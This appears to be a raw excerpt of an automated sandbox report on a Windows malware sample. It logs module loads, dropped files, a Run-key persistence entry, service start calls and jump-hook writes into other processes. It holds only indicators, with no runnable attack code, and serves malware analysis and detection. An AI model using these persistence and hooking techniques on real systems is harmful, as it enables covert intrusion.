                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess created: C:\Program Files (x86)\90m3FHO\33MwVPy.exe "C:\Program Files (x86)\90m3FHO\33MwVPy.exe" Jump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: oledlg.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: d3d9.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: webio.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: d3d9.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: d3d9.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{a07034fd-6caa-4954-ac3f-97a27216f98a}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
                Source: Rudvfa0Z17.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: Rudvfa0Z17.exeStatic file information: File size 3656704 > 1048576
                Source: Rudvfa0Z17.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x282200
                Source: Rudvfa0Z17.exeStatic PE information: More than 200 imports for USER32.dll
                Source: Rudvfa0Z17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Rudvfa0Z17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Rudvfa0Z17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Rudvfa0Z17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Rudvfa0Z17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Rudvfa0Z17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Rudvfa0Z17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                Source: Binary string: \NewJumpLogin\ReleaseSW300exe\JumpLogin.pdb source: Rudvfa0Z17.exe
                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                Source: Rudvfa0Z17.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Rudvfa0Z17.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Rudvfa0Z17.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Rudvfa0Z17.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Rudvfa0Z17.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_006554E8 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006554E8
                Source: initial sampleStatic PE information: section where entry point is pointing to: .ubx1
                Source: 33MwVPy.exe.0.drStatic PE information: section name: .00cfg
                Source: 33MwVPy.exe.0.drStatic PE information: section name: .ubx0
                Source: 33MwVPy.exe.0.drStatic PE information: section name: .ubx1
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00641B27 push ecx; ret 0_2_00641B3A
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00641D65 push ecx; ret 0_2_00641D78
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026E42DA push ecx; ret 0_2_026E42ED
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026DF4D9 push ecx; ret 0_2_026DF4EC
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_100142D6 push ecx; ret 0_2_100142E9
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_1000F4D5 push ecx; ret 0_2_1000F4E8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F7865 push ecx; ret 6_2_6C2F7878
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3173A8 push ecx; ret 6_2_6C317398
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C317399 push ecx; ret 6_2_6C317398
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332B616 push ecx; ret 6_2_0332B629
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332BB2A push ecx; ret 6_2_0332BB3D
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100395F2 push ecx; ret 6_2_10039605
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10039B06 push ecx; ret 6_2_10039B19
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F7865 push ecx; ret 7_2_6C2F7878
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3173A8 push ecx; ret 7_2_6C317398
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C317399 push ecx; ret 7_2_6C317398
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeFile created: C:\Program Files (x86)\90m3FHO\MSVCP140.dllJump to dropped file
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeFile created: C:\Program Files (x86)\90m3FHO\libcef.dllJump to dropped file
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeFile created: C:\Program Files (x86)\90m3FHO\VCRUNTIME140.dllJump to dropped file
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeFile created: C:\Program Files (x86)\90m3FHO\33MwVPy.exeJump to dropped file
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_004107D9 GetSystemMenu,AppendMenuW,AppendMenuW,SendMessageW,SendMessageW,SendMessageW,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,CreateFileW,CloseHandle,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetCommandLineW,CommandLineToArgvW,_wcschr,_wcschr,_wcschr,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,CreateSolidBrush,LoadLibraryW,GetProcAddress,FreeLibrary,0_2_004107D9
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331CA82 StartServiceA,CloseServiceHandle,CloseServiceHandle,Sleep,lstrlen,LocalSize,lstrlen,LocalReAlloc,lstrlen,lstrlen,lstrlen,LocalFree,6_2_0331CA82
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 3116 base: 1200005 value: E9 8B 2F CF 75 Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 3116 base: 76EF2F90 value: E9 7A D0 30 8A Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 3116 base: 12F0007 value: E9 EB DF C3 75 Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 3116 base: 76F2DFF0 value: E9 1E 20 3C 8A Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6848 base: 1310005 value: E9 8B 2F BE 75 Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6848 base: 76EF2F90 value: E9 7A D0 41 8A Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6848 base: 1470007 value: E9 EB DF AB 75 Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6848 base: 76F2DFF0 value: E9 1E 20 54 8A Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6672 base: 1460005 value: E9 8B 2F A9 75 Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6672 base: 76EF2F90 value: E9 7A D0 56 8A Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6672 base: 1480007 value: E9 EB DF AA 75 Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMemory written: PID: 6672 base: 76F2DFF0 value: E9 1E 20 55 8A Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03319C44 IsWindow,GetWindowThreadProcessId,GetCurrentProcessId,GetWindowTextA,IsWindowVisible,lstrlen,LocalAlloc,LocalSize,GetClassNameA,lstrlen,IsWindowEnabled,IsWindowVisible,IsIconic,IsZoomed,lstrcpy,LocalReAlloc,6_2_03319C44
